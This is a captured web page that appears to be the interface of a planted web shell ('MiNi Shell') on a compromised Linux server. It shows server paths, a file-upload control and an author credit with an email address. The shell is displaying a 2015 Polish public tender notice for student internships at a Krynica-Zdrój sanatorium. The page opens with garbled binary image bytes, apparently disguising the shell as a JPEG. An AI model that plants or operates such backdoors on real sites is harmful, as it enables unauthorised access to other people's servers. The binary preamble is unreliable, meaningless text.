JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150409/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150409/49743-N-2015.html

<p class="kh_header"><b>Kraków: Zakup usług organizacji i przeprowadzenia staży - wizyt zawodoznawczych w SP ZOZ Sanatorium Uzdrowiskowe MSW w Krynicy-Zdroju
 w ramach realizacji projektu pn. 
Modernizacja kształcenia zawodowego w Małopolsce</b><br>
<b>Numer ogłoszenia: 49743 - 2015; data zamieszczenia: 09.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie , os. Teatralne 4a, 31-945 Kraków, woj. małopolskie, tel. 12 644 28 72; 12 644 28 71, faks 12 644 99 97.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zjewm.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna województwa małopolskiego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup usług organizacji i przeprowadzenia staży - wizyt zawodoznawczych w SP ZOZ Sanatorium Uzdrowiskowe MSW w Krynicy-Zdroju
 w ramach realizacji projektu pn. 
Modernizacja kształcenia zawodowego w Małopolsce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1/.Przedmiotem niniejszego zamówienia jest usługa, polegająca na organizacji i przeprowadzeniu pięciu edycji staży-wizyt zawodoznawczych w  Samodzielnym Publicznym Zakładzie Opieki Zdrowotnej Sanatorium Uzdrowiskowe MSW, ul. Nitribitta 4, 33-380 Krynica - Zdrój dla uczniów i uczennic Szkoły Policealnej Pracowników Służb Medycznych i Społecznych w Nowym Sączu, w ramach projektu pn.Modernizacja kształcenia zawodowego w Małopolsce, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
2/.W ramach realizacji przedmiotu zamówienia do obowiązków Wykonawcy należy zapewnienie transportu, noclegów, wyżywienia oraz zorganizowanie trzydniowych staży-wizyt zawodoznawczych według programu określonego przez Zamawiającego.

3/.Liczba uczestników: 
Podczas pięciu edycji weźmie udział łącznie 30 uczniów i uczennic                  (I edycja - 6 uczniów, II edycja - 6 uczniów, III edycja - 6 uczniów,                 IV edycja - 6 uczniów , V edycja 6 uczniów) ze Szkoły Policealnej Pracowników Służb Medycznych i Społecznych w Nowym Sączu.

4/.Czas trwania staży - wizyt zawodoznawczych: 
W ciągu pięciu edycji zostanie zrealizowanych łącznie 105 godzin. Przy czym przez 1 godzinę trwania stażu-wizyty zawodoznawczej Zamawiający rozumie godzinę zegarową - 60 minut. I edycja  - 21 godz. (I dzień - 7 godzin, II dzień - 7 godzin,                          III dzień - 7 godzin), II edycja - 21 godz. (I dzień - 7 godzin, II dzień - 7 godzin,                           III dzień - 7 godz.),III edycja - 21 godz. (I dzień - 7 godzin, II dzień - 7 godzin,                        III dzień - 7 godz.), IV edycja - 21 godz. (I dzień - 7 godzin, II dzień - 7 godzin,                         III dzień - 7 godz.).V edycja - 21 godz. (I dzień - 7 godzin, II dzień - 7 godzin,                         III dzień - 7 godz.).
W trakcie staży-wizyt zawodoznawczych przewiduje się przerwy.

5/.Czas realizacji staży - wizyt zawodoznawczych: 
Łącznie w pięciu edycjach zaplanowano 15 dni staży-wizyt zawodoznawczych: w I edycji - 3 dni,  II edycji - 3 dni, III edycji - 3 dni, IV edycji - 3 dni, V edycja - 3 dni. Zamawiający zaleca, aby staże - wizyty zawodoznawcze planowane były w dni powszednie tj. od wtorku do piątku.

6/.Termin realizacji: do 5 czerwca 2015r.
Zamawiający zaleca, aby staże - wizyty zawodoznawcze planowane były w dni powszednie tj. od wtorku do piątku.


7/.Miejsce realizacji staży - wizyt zawodoznawczych:
Samodzielny Publiczny Zakład Opieki Zdrowotnej
Sanatorium Uzdrowiskowe MSW, ul. Nitribitta 4, 33-380 Krynica - Zdrój

8/.Minimalna tematyka staży-wizyt zawodoznawczych:
I dzień staży - wizyt zawodoznawczych:
1.	Charakterystyka Krynicy - Zdroju jako miejscowości uzdrowiskowej.  Wykorzystanie bodźcujących cech klimatu oraz naturalnych surowców leczniczych w procesie terapii różnych jednostek chorobowych. Zabiegi wodolecznicze i balneologiczne. Podział i charakterystyka.
Zapoznanie ze specyfiką Sanatorium jako placówki ochrony zdrowia. 
II dzień staży - wizyt zawodoznawczych:
Masaż jako zabieg leczniczy stosowany w lecznictwie uzdrowiskowym.  Rodzaje masażu, wskazania, przeciwwskazania, przygotowanie pacjenta, technika zabiegu. Terapia manualna jako metoda diagnostyczna i terapeutyczna. Omówienie i prezentacja podstawowych technik diagnostycznych i terapeutycznych.
III dzień staży - wizyt zawodoznawczych:
Kinezyterapia: zapoznanie z ćwiczeniami leczniczymi - gimnastyka ogólnoustrojowa na sali gimnastycznej i w środowisku wodnym, indywidualne ćwiczenia terapeutyczne z wykorzystaniem specjalistycznych metod terapeutycznych (PNF, Pilates, MDT  wg McKenziego).

9/.Obowiązki Wykonawcy:
a.	uzyskanie  zgody Dyrektora  Samodzielnego Publicznego Zakładu Opieki Zdrowotnej Sanatorium Uzdrowiskowe MSW, ul. Nitribitta 4, 33-380 Krynica - Zdrój  na przeprowadzenie staży-wizyt zawodoznawczych, przed podpisaniem umowy,
b.	zapewnienie materiałów dydaktycznych (kserokopie lub broszury tematyczne)
c.	zapewnienie dostępu do urządzeń i przyrządów medycznych,  będących wyposażeniem Samodzielnego Publicznego Zakładu Opieki Zdrowotnej Sanatorium Uzdrowiskowe MSW, ul. Nitribitta 4, 33-380 Krynica - Zdrój,
d.	Wykonawca ponosi odpowiedzialność wobec Zamawiającego za wszelkie szkody wynikłe podczas przeprowadzenia staży - wizyt zawodoznawczych na terenie  Samodzielnego Publicznego Zakładu Opieki Zdrowotnej Sanatorium Uzdrowiskowe MSW, ul. Nitribitta 4, 33-380 Krynica - Zdrój,
e.	realizacja staży-wizyt zawodoznawczych przez wykwalifikowanego trenera, posiadającego doświadczenie zawodowe i wiedzę merytoryczną z tematu objętego przedmiotem zamówienia, a także odpowiedzialnego za prawidłowy przebieg staży-wizyt zawodoznawczych,
f.	po zakończeniu staży-wizyt zawodoznawczych wypełnienie                       z uczestnikami anonimowej ankiety ewaluacyjnej,
g.	przygotowanie, podpisanie i wydanie certyfikatów/zaświadczeń udziału w stażu-wizycie zawodoznawczej, 
h.	zapewnienie ubezpieczenia NNW uczestnikom staży-wizyt zawodoznawczych podczas pobytu i realizacji staży-wizyt zawodoznawczych.
Zaświadczenie powinno zawierać informacje o wymiarze godzin oraz program zajęć i musi zostać wydane zgodnie z aktualnymi wytycznymi Departamentu Zarządzania Europejskim Funduszem Społecznym Ministerstwa Rozwoju Regionalnego, dotyczącymi zasad oznaczania projektów i działań informacyjno-promocyjnych w ramach Programu Operacyjnego Kapitał Ludzki. 
Wzór papieru firmowego zostanie udostępniony przez Zamawiającego niezwłocznie po podpisaniu umowy. 


10/.W ramach promocji przedmiotu umowy Wykonawca zobowiązany jest także do:
a.	oznakowania sali, w których będą prowadzone zajęcia, zgodnie                      z Wytycznymi dotyczącymi oznakowania projektów w ramach Programu Operacyjnego Kapitał Ludzki,
b.	informowania uczestników stażu-wizyty zawodoznawczej o fakcie współfinansowania zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
c.	stosowania na wszystkich dokumentach w trakcie wykonywania przedmiotowego zamówienia znaków zgodnie z Wytycznymi POKL,
d.	odpowiedniego oznakowania pojazdu zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.

11/.Wykonawca po zakończeniu wszystkich edycji staży-wizyt zawodoznawczych przedstawi Zamawiającemu następujące dokumenty:
a. listę obecności z własnoręcznymi podpisami uczestników staży - wizyt zawodoznawczych w każdym dniu zajęć, 
b. program staży-wizyty zawodoznawczej oraz dziennik zajęć, 
c. potwierdzenie odbioru materiałów szkoleniowych wraz z jednym egzemplarzem materiałów, 
d. oryginały ankiet ewaluacyjnych, 
e. kopię wydanych certyfikatów/zaświadczeń oraz listę potwierdzającą ich odbiór przez uczestników, 
f. listy z potwierdzeniem wykonania usługi wyżywienia, noclegu 
i transportu, potwierdzone własnoręcznymi podpisami uczestników,
g. informację o zrealizowaniu usługi wraz z fakturą VAT/rachunkiem. 
12/.Szczegółowe wymagania związane z wyżywieniem

Do obowiązków Wykonawcy należy zapewnienie uczestnikom stażu -wizyty zawodoznawczej  wyżywienia, w  tym łącznie w trakcie trwania zamówienia: 60 śniadań, 90 obiadów i 60 kolacji, zgodnie 
z następującym rozkładem:   dwóch śniadań  (w drugim i trzecim dniu stażu-wizyty zawodoznawczej),  trzech obiadów (w pierwszym, drugim, trzecim dniu stażu-wizyty zawodoznawczej) i dwóch kolacji 
(w pierwszym i drugim dniu stażu-wizyty zawodoznawczej). 

Wyżywienie: 
a.śniadanie - pieczywo różnorodne, danie na ciepło: jajecznica lub kiełbaski na gorąco lub wędliny, ser żółty, dżem, świeże warzywa: pomidor, ogórek zielony, napoje: kawa, herbata, dodatki: cytryna, mleko, masło. 
b.obiad - zupa, danie główne (mięsne lub rybne z dodatkiem ziemniaków lub ryżu i zestawu surówek), napoje: kompot lub soki owocowe.
c.kolacja - pieczywo różnorodne, wędliny, ser, świeże warzywa: pomidor, ogórek zielony, napoje: herbata, dodatki: cytryna, mleko, masło, woda mineralna gazowana lub niegazowana (0,33l na osobę).

13/.Szczegółowe wymagania związane z zakwaterowaniem

Przedmiotem zamówienia jest organizacja dla pięciu edycji staży- wizyt zawodoznawczych łącznie 60 noclegów, zgodnie z planem,  na terenie miejsca realizacji stażu - wizyty zawodoznawczej lub w obiekcie oddalonym maksymalnie  500m  od SPZOZ SU MSW, 
ul. Nitribitta 4 w Krynicy - Zdrój, w tym dla:
 I edycji stażu- wizyty zawodoznawczej planuje się dwa noclegi dla 6 osób tj. łącznie 12 noclegów , 
II edycji  stażu-wizyty zawodoznawczej planuje się dwa noclegi dla 6 osób  tj.  łącznie 12 noclegów.
III edycji  stażu- wizyty zawodoznawczej planuje się dwa noclegi dla 6 osób tj.  łącznie 12 noclegów.
IV edycji  stażu- wizyty zawodoznawczej planuje się dwa noclegi dla 6 osób tj.  łącznie 12 noclegów.
V edycji  stażu- wizyty zawodoznawczej planuje się dwa noclegi dla 6 osób tj.  łącznie 12 noclegów

Zakwaterowanie: 
Wykonawca zapewni zakwaterowanie grupy na terenie miejsca realizacji stażu - wizyty zawodoznawczej lub w obiekcie oddalonym maksymalnie  500m  od SPZOZ SU MSW, ul. Nitribitta 4 w Krynicy - Zdrój,  w budynku stacjonarnym, spełniającym min. następujące wymagania: stołówka mieszcząca się w budynku zakwaterowania,
pokoje 2,3,4 osobowe z samodzielnym węzłem higieniczno-sanitarnym.
Wyposażenie łazienki: wanna z baterią i natryskiem lub kabina natryskowa, umywalka z blatem lub półka, wc, lustro, gniazdko elektryczne, pojemnik na śmieci, brak ograniczeń w korzystaniu                      z ciepłej wody.
Minimalne wyposażenie pokoi: łóżka (w ilości odpowiadającej nazwie pokoju), pościel, nocny stolik lub półka przy każdym miejscu do spania, szafa lub zabudowana wnęka garderobiana, stół,biurko, krzesło lub inny mebel do siedzenia, wieszak, oświetlenie.
Obiekt nowoczesny, czysty, wyposażony w sprawne urządzenia sanitarne i techniczne.
Standard typowy obiektom dwugwiazdkowym.
Wykonawca otrzyma imienną listę uczestników stażu po podpisaniu umowy.

14/.Transport
Wykonawca zapewni transport (autokarem lub busem) uczestników                   z Nowego Sącza do miejsca realizacji staży i transport powrotny do Nowego Sącza według planu:
I dzień
1.	Wyjazd o godzinie 7:15 z Nowego Sącza - Szkoła Policealna Pracowników Służb Medycznych i Społecznych w Nowym Sączu
2.	Przyjazd do miejsca zakwaterowania ok. godz. 8.15
3.	Zakwaterowanie  godz. 8.30
4.	Przejazd do miejsca realizacji stażu-wizyty zawodoznawczej 8.45
5.	Odbycie stażu-wizyty zawodoznawczej - 7 godzin: 
a.	Godzina rozpoczęcia: 9.00
b.	Godzina zakończenia: 16.45
c.	Obiad w przerwie ok. godz. 13.00
6.	Powrót do miejsca zakwaterowania ok. godz. 17.00
7.	Kolacja ok. 18.00
8.	Nocleg
II dzień
1.	Śniadanie godz. 8.15
2.	Przejazd do miejsca realizacji stażu-wizyty zawodoznawczej 8.45
3.	Odbycie stażu-wizyty zawodoznawczej - 7 godzin:
a.	Godzina rozpoczęcia: 9.00
b.	Godzina zakończenia:16.45
c.	Obiad w przerwie ok. godz. 13.00
4.	Powrót do miejsca zakwaterowania ok. godz.17.00
5.	Kolacja ok. 18.00
6.	Nocleg

III dzień
1.Śniadanie godz. 8.15
2.Przejazd do miejsca realizacji stażu-wizyty   zawodoznawczej8.45
3.Odbycie stażu-wizyty zawodoznawczej - 7 godzin:
a.Godzina rozpoczęcia: 9.00
b.Godzina zakończenia:16.45
c.Obiad w przerwie ok. godz. 13.00
4.Powrót do miejsca zakwaterowania ok. godz.17.00
5.Wykwaterowanie i wyjazd do Nowego Sącza ok. godz. 17.30
6.Powrót do Nowego Sącza ok. godz.18.30

Transport odbędzie się pojazdem sprawnym technicznie, dopuszczonym na mocy przepisów drogowych do poruszania się, ubezpieczonym. Każdy uczestnik staży ma mieć zapewnione miejsce siedzące i miejsce na bagaż w luku bagażowym pojazdu.  W przypadku awarii środka transportu Wykonawca zapewni na własny koszt zastępczy środek transportu, spełniający warunki określone w SIWZ i umowie, w taki sposób aby nie powodować opóźnień czasowych. Zamawiający  nie będzie ponosił z tego tytułu żadnych dodatkowych kosztów. 
W przypadku, gdy Wykonawca nie  zapewni zastępczego środka transportu oraz kierowców w sytuacji powyżej określonej Zamawiający zleci osobie trzeciej wykonanie zastępczej usługi. Wykonawca ponosi koszty zapewnienia zastępczego środka transportu.
Wykonawca pokrywa wszystkie wymagane opłaty drogowe                                  i parkingowe.

Szczegółowe wymagania dotyczące ubezpieczenia:
Wykonawca zapewni ubezpieczenie NNW na czas transportu i pobytu dla każdego uczestnika staży-wizyt zawodoznawczych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 55.27.00.00-3, 60.10.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek dysponowania odpowiednim osobami
zdolnymi do wykonania zamówienia Zamawiający uzna
Wykonawców, którzy dysponują osobą, pełniącą funkcję trenera,
będącego  pracownikiem  Samodzielnego Publicznego Zakładu Opieki
Zdrowotnej Sanatorium Uzdrowiskowe MSW i posiada minimum 5 letni staż pracy na stanowisku fizjoterapeuty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">szczegółowy program stażu-wizyty zawodoznawczej</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1/. Dowód dysponowania zasobami niezbędnymi do realizacji zamówienia w przypadku polegania na zdolnościach innych podmiotów, zgodnie z art. 26 ust. 2b ustawy, w szczególności pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia wraz z wykazaniem, że zobowiązanie to zostało podpisane przez osoby uprawnione (np. dokumenty rejestrowe, pełnomocnictwa) - jeżeli dotyczy. 2/. Pełnomocnictwo - do reprezentowania Wykonawcy w postępowaniu albo do reprezentowania Wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana, jako upoważniona do jego reprezentacji we właściwym rejestrze lub w Centralnej Ewidencji i Informacji o Działalności Gospodarczej</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - dodatkowy moduł programu - 5</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zjewm.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie, os. Teatralne 4a, 31-945 Kraków pok. nr 102a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.04.2015 godzina 12:15, miejsce: Zespół Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie, os. Teatralne 4a, 31-945 Kraków pok. nr 213.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego za pośrednictwem Programu Operacyjnego Kapitał Ludzki, działanie 9.2; Projekt Systemowy Województwa Małopolskiego Modernizacja Kształcenia Zawodowego w Małopolsce.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com